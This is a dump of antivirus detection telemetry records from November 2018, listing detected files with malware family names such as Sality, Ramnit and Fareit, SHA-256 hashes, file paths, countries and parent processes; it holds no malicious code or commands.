  Row(detection=Row(filename='avscan-20181102-060920-cea7a8ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060920-CEA7A8EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051939-dde64b67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051939-DDE64B67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='etabs_2015.exe', filepath='C:\\Users\\X\\Desktop\\data\\pro\\New folder\\patches and cracks\\Etabs 2015 crack\\etabs_2015.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:11:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T18:08:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='102613014533326.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\102613014533326.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jkh.open.info.tariff.warm факт 2011.xls', filepath='D:\\СОФТ\\ФЛЕШКА\\надежда\\тарифная\\Стандарты раскрытия информации\\факт\\JKH.OPEN.INFO.TARIFF.WARM факт 2011.xls', filesize=1408000, name='W97M/Agent.4231.#M1.#R1'), hash='0404e94fb8da402743222554e04c0ee17b27badb88f94f144b8935317e587f97', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:35:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhc18b.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHC18B.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:39:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155722-cfacd4a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155722-CFACD4A4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='484dd4892ba00b143abb080f5d39015b91c6473d1b90c6ae87512d22fa7287dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\484DD4892BA00B143ABB080F5D39015B91C6473D1B90C6AE87512D22FA7287DD', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='484dd4892ba00b143abb080f5d39015b91c6473d1b90c6ae87512d22fa7287dd', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:27:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='138452618526670.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\138452618526670.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='garmen.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\RPG\\KEBIJAKAN GARMEN\\GARMEN.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:10:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='delnesec.exe', filepath='C:\\temp\\DelNESEC.exe', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\A3000\\ExtInstall\\HEAT_uninstall.exe', parentsize=1947648, timestamp='2018-11-01T09:49:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e-id.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\BPJS KESEHATAN\\E-ID\\E-ID.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155545-bf3c7abe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155545-BF3C7ABE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scan.exe', filepath='\\\\Shop-mep\\SCAN\\SCAN.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='3c2908cb1415735683089ca58342f4e9ddb26f1c99735ed9e1aa3daa68dd44ea', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-01T06:46:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T16:53:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:36:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155709-cd664051', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155709-CD664051', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:03:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh7b63', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH7B63', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:42:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='axcrypt2go.exe', filepath='C:\\Program Files\\Axantum\\AxCrypt\\AxCrypt2Go.exe', filesize=568000, name='W32/Sality.AT.#M1.#R1'), hash='2011ec1b6eef77dfcc59f477f71d3b48d78d1695c41fc6c6222ec259b8f7582b', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:26:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154803-71722e1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154803-71722E1C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='l760g.html', filepath='C:\\Program Files\\Z3X\\Samsung\\SamsungToolPRO\\Data\\manuals\\l760g.html', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='401227ac485ec78160bb412aed64bf4bd44b68e7d5c49a629760b544609be15a', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Browser\\Application\\AvastBrowser.exe', parentsize=1883096, timestamp='2018-11-01T13:52:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\NHML-1.8.1.10\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:l8hiGMlKnE2EiQ\\\\\\/N.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:37:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-213027-e7c43f0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_114e5570\\AVSCAN-20181031-212005-98436303\\AVSCAN-20181031-213027-E7C43F0E', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:30:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-223550-d346cbd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d9803ab\\AVSCAN-20181031-223431-C8B49014\\AVSCAN-20181031-223550-D346CBD0', filesize=1344000, name='Adware/Zdengo.kykpb.#M1.#R1'), hash='79a642a6de1afadd3162f8bc38d4bab8c0835cdacc489ee0ab6523e591a1a16b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:35:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111705-28d3fe7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111705-28D3FE7C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='6f45ceba7d6da57833b2d4b6c4ac992f6ef8b9d415eb76b509a188b23bea45d3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deldrv.exe', filepath='E:\\Daiver Printer\\Canon MX328\\win\\XPS\\x86\\DrvSetup\\DelDrv.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='5a0ca1f2a1226da6571a0466d7f0e0c35957f38aba1e52ee029fb018da5b2fbd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T11:18:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142922-8e7a9f08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9a0c26\\AVSCAN-20181101-140116-B70F1409\\AVSCAN-20181101-142922-8E7A9F08', filesize=256000, name='TR/Crypt.ZPACK.Gen.#M1.#R1'), hash='bfa4005134c36fc713f28923895a1d487ad883ee9892ed6e53004eb95f9f95dc', metadata=Row(cmdline=None, country='HT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:29:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='报总部201306投顾提成表.xls', filepath='F:\\CJ\\U盘备份\\20181101\\工作资料\\财富证券工作资料\\工作资料\\投顾资料\\资料\\投顾业绩提成明细\\2013\\公司上报提出表\\报总部201306投顾提成表.xls', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='72fb1b1fdf6460845b84b6d8140470ec90b16929bcc160bb4c3e836bac9ee404', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T01:04:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141243-e69ebe26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_103c7217\\AVSCAN-20181101-141146-DA744C4C\\AVSCAN-20181101-141243-E69EBE26', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:12:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ee35f1e6d71b5aa32c04659c0f17fbe09d9132efd84f8a659d4dea0be2c65127', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\EE35F1E6D71B5AA32C04659C0F17FBE09D9132EFD84F8A659D4DEA0BE2C65127', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ee35f1e6d71b5aa32c04659c0f17fbe09d9132efd84f8a659d4dea0be2c65127', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:50:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='camera.exe', filepath='G:\\DCIM\\Camera.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:53:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dlsloader.exe', filepath='D:\\DriverePC\\CompaqEvoD51S\\Audio_SP27103\\SoundMAX Synthesizer\\DLSLoader.exe', filesize=1024000, name='W32/Sality.Y.#M1.#R1'), hash='7ba62c021896a05d4a2d593915cb02a5db140c131ace98b289103112b9c76859', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:13:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190732-09adfddf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190732-09ADFDDF', filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:09:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='svnserve.exe', filepath='C:\\xampp\\apache\\bin\\svnserve.exe', filesize=116000, name='W32/Small.L.#M1.#R1'), hash='c0808003f19577a05f54d545ae2b26f137479f6e97757b9ac690d276c058fc3b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-01T06:29:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='of duty.exe', filepath='C:\\Users\\X\\Documents\\Call Of Duty\\Of Duty.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-082803-4ca36b22', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181031-205810-8E73B4A7\\AVSCAN-20181101-082803-4CA36B22', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='85b40609edccf2cbf2b9d366e6e2b055382cd838450e7ab0655cb7589c0a85b0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\85B40609EDCCF2CBF2B9D366E6E2B055382CD838450E7AB0655CB7589C0A85B0', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='85b40609edccf2cbf2b9d366e6e2b055382cd838450e7ab0655cb7589c0a85b0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsd1B8A.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18594760, timestamp='2018-11-01T07:06:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:50:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3EBF898E-6BAB-4161-B420-37443DC0569C}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='2a209bc68a3f64655ff3d23d2e4f09e79584b31d6a5ec8bbe9ba88872f6711e4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='65b4d30076c77fd6442cf7918c60cd781ffa12e0ee05b4843e7ae7b8730ab8a9', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:45:57Z'), dt=datetime.date(2018, 11, 1)),
